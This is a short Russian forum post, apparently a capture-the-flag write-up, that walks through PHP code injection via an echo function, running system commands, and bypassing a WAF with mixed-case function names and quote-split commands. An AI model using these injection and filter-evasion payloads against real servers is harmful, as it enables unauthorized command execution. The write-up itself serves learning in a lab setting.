Показать сообщение отдельно

  #1  
Старый 13.12.2023, 18:45
tree
Новичок
Регистрация: 12.12.2023
Сообщений: 0
С нами: 1275821

Репутация: 0
По умолчанию

Привет! Разберем решение таска Обходной путь
Функционал приложения php функция - echo. появляется мысль о эксплутации php injection попробуем вывести phpinfo()



Сработало! значит попробуем выполнить команды на сервере через функцию system
echo '123';system(”id”);



WAF нас блочит, значит будем пробовать обойти фильтрацию.
echo '123';sYsTem("id");



Отлично! Пробуем посмотреть файлы в каталоге.
echo '123';sYsTem("ls");
но WAF снова нас заблочил, значит и тут найти обходной путь
echo ‘123’;sYsTem("'l''s'"’);



Дальше остается найти только флаг
 
Ответить с цитированием